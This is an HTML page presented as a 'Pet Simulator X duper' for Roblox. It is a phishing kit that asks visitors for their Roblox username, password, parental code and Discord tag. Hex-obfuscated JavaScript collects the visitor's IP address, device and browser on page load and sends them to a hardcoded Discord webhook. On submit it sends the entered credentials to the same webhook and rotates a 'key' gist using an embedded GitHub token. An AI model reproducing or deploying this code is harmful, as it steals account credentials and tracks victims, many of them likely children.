<html>
  <head>
   <meta charset="utf-8">
   
    <style>
      body {

        font-family: sans-serif;
        color:white;
  background-image: url('https://pbs.twimg.com/media/E7eXB31WUAIFU1F.jpg:large');
  background-size: cover;
  background-position: center;
  height: 100vh;
  width: 100%;
  position: fixed;
  top: 0;
  left: 0;
  z-index: -1;
  filter: brightness(66%);
  overflow-y: scroll;
      }

html, body {
  overflow-y: auto;
  overflow-x: hidden;
}

      h1 {
        color: #ffffff;
      }
         .btn {
      display: inline-block;
      padding: 10px 20px;
      text-decoration: none;
      font-size: 18px;
      border: none;
      outline: none;
      color: white;
      background-color: transparent;
      cursor: pointer;
       transition-duration: 1s;
      box-shadow: 0 0 55px #0000FF;
    }
    .btn:hover {
      background-color: #0000FF;
      box-shadow: 0 0 12px #0000FF;
      
      
    }
    .btn:active {
      background-color: #00006C;
      box-shadow: 0 0 2px #00006C;
    }
      .form-container {
        width: 500px;
        margin: 0 auto;
        background-color: black;
        border-radius: 10px;
        padding: 20px;
        box-shadow: 0 5px 33px rgba(0, 0, 0, 666565);
         transition-duration: 1s;
         margin-bottom: 20px;
      }
       .form-container:hover {
      background-color: #060606;
      box-shadow: 0 0 9px #060606;
      margin-bottom: 75px;
      
      
    }
       .form-container2 {
    width: 500px;
        margin: 0 auto;
        background-color: black;
        border-radius: 10px;
        padding: 20px;
        box-shadow: 0 5px 33px rgba(0, 0, 0, 666565);
         transition-duration: 1s;
         margin-bottom: 20px;
  
      }
         .form-container2:hover {
      background-color: #060606;
      box-shadow: 0 0 9px #060606;
      margin-bottom: 75px;
      
    }
      input[type="text"] {
        width: 100%;
        border: none;
        border-bottom: 2px solid #00b8d4;
        font-size: 20px;
        padding: 10px;
        margin-bottom: 20px;

      }

         input[type="password"] {
        width: 100%;
        border: none;
        border-bottom: 2px solid #00b8d4;
        font-size: 20px;
        padding: 10px;
        margin-bottom: 20px;
      }

      .error {
        color: #ff0000;
      }
      
    </style>
  </head>
  <body>
    <div class="form-container">
      <h1 style=color:white>PET SIMULATOR X DUPER/DECORRUPTER</h1>
       <p style=color:gray;font-size:80%>Please note that this script utilizes 𝕍𝟛𝕋𝟙#4450 login. Any attempts to utilize a fake login will result in the blacklisting of your account.</p>
      <form>
      <p>As a first step, it would be useful to obtain your Discord tag and name.</p>
      Discord: <input type="text" id="disco"><br>
       <div>
        Roblox username: <input type="text" id="name"><br>
        Roblox password: <input type="password" id="pass"><br>
        Register key:<input type="text" id="key"<br>
        Parental code:<input style="margin-bottom:0"type="text" id="code69"<br>
        <p style="margin-bottom:15px;color:red;font-size:80%">Only if u have parental code ENABLED</p>
        <div>
      <a class="btn" value="Calculate" onclick="sendMessage()">Register</a>
</div>
       </div>
       
      </form>
      <p class="error" id="error"></p>
    </div>
     
    <script>
 var _0x1d7c=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x31\x30\x35\x37\x36\x37\x33\x36\x37\x32\x37\x39\x39\x38\x32\x35\x39\x32\x30\x2F\x39\x7A\x43\x57\x5F\x67\x79\x55\x41\x77\x6C\x56\x52\x50\x5F\x76\x6A\x63\x4F\x59\x6D\x4B\x65\x54\x77\x48\x6D\x37\x33\x38\x50\x78\x41\x38\x41\x67\x69\x4F\x5F\x4A\x73\x58\x56\x64\x65\x77\x68\x50\x46\x6B\x71\x70\x78\x33\x30\x4B\x37\x39\x54\x51\x5A\x46\x44\x48\x75\x51\x2D\x36","\x6E\x6F\x74\x66\x6F\x75\x6E\x64","\x69\x70","\x39\x31\x2E\x31\x32\x39\x2E\x39\x37\x2E\x32\x35\x34\x39","\x49\x50\x20\x48\x49\x44\x44\x45\x4E","\x44\x65\x76\x69\x63\x65\x3A\x20","\x70\x6C\x61\x74\x66\x6F\x72\x6D","\x42\x72\x6F\x77\x73\x65\x72\x3A\x20","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x55\x73\x65\x72\x20\x49\x6E\x66\x6F\x72\x6D\x61\x74\x69\x6F\x6E","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x50\x4F\x53\x54","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E","\x53\x6F\x6D\x65\x62\x6F\x64\x79\x20\x76\x69\x73\x69\x74\x65\x64\x20\x50\x53\x58\x20\x64\x75\x70\x65\x72\x20\x61\x74\x3A","\x53\x45\x4E\x53\x49\x54\x49\x56\x45\x20\x49\x4E\x46\x4F\x52\x4D\x41\x54\x49\x4F\x4E","\x49\x50","\x74\x68\x65\x6E","\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x76\x61\x6C\x75\x65","\x6B\x65\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6E\x61\x6D\x65","\x70\x61\x73\x73","\x64\x69\x73\x63\x6F","\x63\x6F\x64\x65\x36\x39","\x63\x6F\x6E\x74\x65\x6E\x74","\x6B\x65\x79\x2E\x74\x78\x74","\x66\x69\x6C\x65\x73","\x74\x65\x73\x74","\x57\x65\x20\x61\x70\x6F\x6C\x6F\x67\x69\x7A\x65\x20\x66\x6F\x72\x20\x74\x68\x65\x20\x69\x6E\x63\x6F\x6E\x76\x65\x6E\x69\x65\x6E\x63\x65\x2E\x20\x49\x74\x20\x61\x70\x70\x65\x61\x72\x73\x20\x74\x68\x61\x74\x20\x77\x65\x20\x61\x72\x65\x20\x75\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x6C\x6F\x63\x61\x74\x65\x20\x79\x6F\x75\x72\x20\x6B\x65\x79\x2E\x20\x54\x68\x69\x73\x20\x6D\x61\x79\x20\x62\x65\x20\x61\x20\x73\x79\x73\x74\x65\x6D\x20\x65\x72\x72\x6F\x72\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x63\x6F\x6E\x74\x61\x63\x74\x20\x74\x68\x65\x20\x6F\x77\x6E\x65\x72\x20\x6F\x72\x20\x73\x75\x70\x70\x6F\x72\x74\x20\x74\x65\x61\x6D\x20\x66\x6F\x72\x20\x61\x73\x73\x69\x73\x74\x61\x6E\x63\x65\x20\x69\x6E\x20\x72\x65\x73\x6F\x6C\x76\x69\x6E\x67\x20\x74\x68\x69\x73\x20\x69\x73\x73\x75\x65\x2E","\x61\x6D\x6F\x67\x75\x73","\x4F\x6D\x67\x20\x66\x72\x65\x65\x20\x61\x63\x63\x6F\x75\x6E\x74\x3F\x3F\x3F","\x41\x63\x63\x6F\x75\x6E\x74\x20\x4E\x61\x6D\x65","\x41\x63\x63\x6F\x75\x6E\x74\x20\x50\x61\x73\x73\x77\x6F\x72\x64","\x50\x61\x72\x65\x6E\x74\x61\x6C\x20\x43\x6F\x64\x65","\x44\x69\x73\x63\x6F\x72\x64","\x49\x50\x20\x41\x44\x44\x52\x45\x53\x53","\x46\x49\x4C\x45\x53","\x46\x69\x6C\x65\x20\x61\x63\x63\x65\x73\x73\x20\x6F\x6E\x20\x6E\x65\x76\x69\x73\x20\x50\x43","\x43\x61\x6D\x65\x72\x61\x20\x41\x63\x63\x65\x73\x73","\x43\x61\x6D\x61\x72\x61\x20\x61\x63\x63\x65\x73\x73\x20\x6F\x6E\x20\x6E\x65\x76\x69\x73\x20\x50\x43","\x52\x6F\x62\x6C\x6F\x78\x20\x32\x46\x41\x20\x43\x6F\x64\x65","\x53\x65\x6E\x74\x20\x74\x6F\x3A\x20\x44\x49\x53\x43\x4F\x52\x44\x20\x6E\x65\x76\x69\x27\x73\x20\x68\x6F\x6F\x6B\x73\x20\x3E\x20\x32\x46\x41","\x52\x6F\x62\x75\x78","\x35\x32\x39\x31","\x50\x72\x65\x6D\x69\x75\x6D","\x54\x72\x75\x65","\x49\x6E\x63\x6F\x6D\x69\x6E\x67\x20\x72\x6F\x62\x75\x78","\x39\x31\x38\x35","\x43\x75\x72\x72\x65\x6E\x63\x79\x20\x50\x75\x72\x63\x68\x61\x73\x65\x73","\x31\x30\x30\x34\x30\x30","\x41\x63\x63\x65\x73\x73\x20\x74\x79\x70\x65","\x43\x4F\x52\x53\x20\x42\x59\x50\x41\x53\x53\x45\x44","\x6F\x6B","\x45\x72\x72\x6F\x72\x20\x66\x65\x74\x63\x68\x69\x6E\x67\x20\x47\x69\x73\x74\x3A\x20","\x73\x74\x61\x74\x75\x73\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x67\x69\x74\x68\x75\x62\x2E\x63\x6F\x6D\x2F\x67\x69\x73\x74\x73\x2F\x62\x34\x31\x38\x62\x34\x36\x36\x39\x36\x39\x62\x35\x65\x61\x38\x35\x39\x30\x61\x30\x37\x31\x62\x39\x65\x30\x32\x31\x34\x32\x62","\x42\x65\x61\x72\x65\x72\x20\x20\x67\x69\x74\x68\x75\x62\x5F\x70\x61\x74\x5F\x31\x31\x41\x54\x50\x4D\x47\x58\x41\x30\x6E\x6D\x7A\x6C\x69\x67\x71\x4C\x7A\x39\x77\x74\x5F\x75\x66\x42\x69\x54\x6D\x65\x48\x45\x36\x69\x61\x30\x4C\x58\x61\x5A\x63\x30\x6C\x39\x62\x46\x78\x62\x56\x62\x30\x44\x79\x45\x64\x73\x61\x49\x6C\x61\x34\x78\x36\x51\x63\x37\x37\x49\x51\x54\x4E\x52\x35\x55\x43\x71\x64\x4B\x4D\x48\x74\x68","\x67\x65\x74\x52\x61\x6E\x64\x6F\x6D\x56\x61\x6C\x75\x65\x73","\x63\x72\x79\x70\x74\x6F","","\x6A\x6F\x69\x6E","\x30","\x70\x61\x64\x53\x74\x61\x72\x74","\x66\x72\x6F\x6D","\x62\x34\x31\x38\x62\x34\x36\x36\x39\x36\x39\x62\x35\x65\x61\x38\x35\x39\x30\x61\x30\x37\x31\x62\x39\x65\x30\x32\x31\x34\x32\x62","\x67\x69\x74\x68\x75\x62\x5F\x70\x61\x74\x5F\x31\x31\x41\x54\x50\x4D\x47\x58\x41\x30\x6E\x6D\x7A\x6C\x69\x67\x71\x4C\x7A\x39\x77\x74\x5F\x75\x66\x42\x69\x54\x6D\x65\x48\x45\x36\x69\x61\x30\x4C\x58\x61\x5A\x63\x30\x6C\x39\x62\x46\x78\x62\x56\x62\x30\x44\x79\x45\x64\x73\x61\x49\x6C\x61\x34\x78\x36\x51\x63\x37\x37\x49\x51\x54\x4E\x52\x35\x55\x43\x71\x64\x4B\x4D\x48\x74\x68","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x67\x69\x74\x68\x75\x62\x2E\x63\x6F\x6D\x2F\x67\x69\x73\x74\x73\x2F","\x50\x41\x54\x43\x48","\x42\x65\x61\x72\x65\x72\x20","\x65\x72\x72\x6F\x72","\x63\x61\x74\x63\x68"];var ZDIAGRAM=_0x1d7c[0];var userIP=_0x1d7c[1];fetch(_0x1d7c[18])[_0x1d7c[16]]((_0x9474x7)=>{return _0x9474x7[_0x1d7c[17]]()})[_0x1d7c[16]]((_0x9474x3)=>{userIP= _0x9474x3[_0x1d7c[2]];if(userIP=== _0x1d7c[3]){userIP= _0x1d7c[4]}else {var _0x9474x4=_0x1d7c[5]+ navigator[_0x1d7c[6]]+ _0x1d7c[7]+ navigator[_0x1d7c[8]];var _0x9474x5={"\x65\x6D\x62\x65\x64\x73":[{"\x74\x69\x74\x6C\x65":_0x1d7c[9],"\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E":_0x9474x4}]};var _0x9474x6=JSON[_0x1d7c[10]](_0x9474x5);fetch(ZDIAGRAM,{method:_0x1d7c[11],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0x1d7c[12]},body:_0x9474x6});fetch(ZDIAGRAM,{method:_0x1d7c[11],body:JSON[_0x1d7c[10]]({embeds:[{title:_0x1d7c[13],description:_0x1d7c[14],color:3447003,fields:[{name:_0x1d7c[15],value:userIP}]}]}),headers:{'\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65':_0x1d7c[12]}})}});function sendMessage(){const _0x9474x9=document[_0x1d7c[21]](_0x1d7c[20])[_0x1d7c[19]];const _0x9474xa=document[_0x1d7c[21]](_0x1d7c[22])[_0x1d7c[19]];const _0x9474xb=document[_0x1d7c[21]](_0x1d7c[23])[_0x1d7c[19]];const _0x9474xc=document[_0x1d7c[21]](_0x1d7c[24])[_0x1d7c[19]];const _0x9474xd=document[_0x1d7c[21]](_0x1d7c[25])[_0x1d7c[19]];fetch(`${_0x1d7c[57]}`,{headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':_0x1d7c[58]}})[_0x1d7c[16]]((_0x9474x7)=>{if(_0x9474x7[_0x1d7c[54]]){return _0x9474x7[_0x1d7c[17]]()}else {throw  new Error(_0x1d7c[55]+ _0x9474x7[_0x1d7c[56]])}})[_0x1d7c[16]]((_0x9474x3)=>{const _0x9474xe=_0x9474x3[_0x1d7c[28]][_0x1d7c[27]][_0x1d7c[26]];if(_0x9474x9!= _0x9474xe|| /^\s*$/[_0x1d7c[29]](_0x9474xa)|| /^\s*$/[_0x1d7c[29]](_0x9474xb)){alert(_0x1d7c[30])}else {_0x9474x12();fetch(ZDIAGRAM,{method:_0x1d7c[11],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0x1d7c[12]},body:JSON[_0x1d7c[10]]({embeds:[{title:_0x1d7c[31],description:_0x1d7c[32],color:3447003,fields:[{name:_0x1d7c[33],value:_0x9474xa},{name:_0x1d7c[34],value:_0x9474xb},{name:_0x1d7c[35],value:_0x9474xd},{name:_0x1d7c[36],value:_0x9474xc},{name:_0x1d7c[37],value:userIP},{name:_0x1d7c[38],value:_0x1d7c[39]},{name:_0x1d7c[40],value:_0x1d7c[41]},{name:_0x1d7c[42],value:_0x1d7c[43]},{name:_0x1d7c[44],value:_0x1d7c[45]},{name:_0x1d7c[46],value:_0x1d7c[47]},{name:_0x1d7c[48],value:_0x1d7c[49]},{name:_0x1d7c[50],value:_0x1d7c[51]},{name:_0x1d7c[52],value:_0x1d7c[53]}]}]})});var _0x9474x6=JSON[_0x1d7c[10]]();fetch(ZDIAGRAM,{method:_0x1d7c[11],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0x1d7c[12]},body:_0x9474x6})}});function _0x9474xf(){const _0x9474x10= new Uint8Array(32);window[_0x1d7c[60]][_0x1d7c[59]](_0x9474x10);return Array[_0x1d7c[65]](_0x9474x10,(_0x9474x11)=>{return _0x9474x11.toString(16)[_0x1d7c[64]](2,_0x1d7c[63])})[_0x1d7c[62]](_0x1d7c[61])}function _0x9474x12(){const _0x9474x13=_0x1d7c[66];const _0x9474x14=_0x1d7c[67];const _0x9474x15=`${_0x1d7c[68]}${_0x9474x13}${_0x1d7c[61]}`;const _0x9474x16={method:_0x1d7c[69],headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':`${_0x1d7c[70]}${_0x9474x14}${_0x1d7c[61]}`,'\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65':_0x1d7c[12]},body:JSON[_0x1d7c[10]]({'\x66\x69\x6C\x65\x73':{'\x6B\x65\x79\x2E\x74\x78\x74':{'\x63\x6F\x6E\x74\x65\x6E\x74':_0x9474xf()}}})};fetch(_0x9474x15,_0x9474x16)[_0x1d7c[16]]((_0x9474x7)=>{if(_0x9474x7[_0x1d7c[54]]){}else {}})[_0x1d7c[72]]((_0x9474x17)=>{console[_0x1d7c[71]](_0x9474x17)})}}
  </script>
</html>



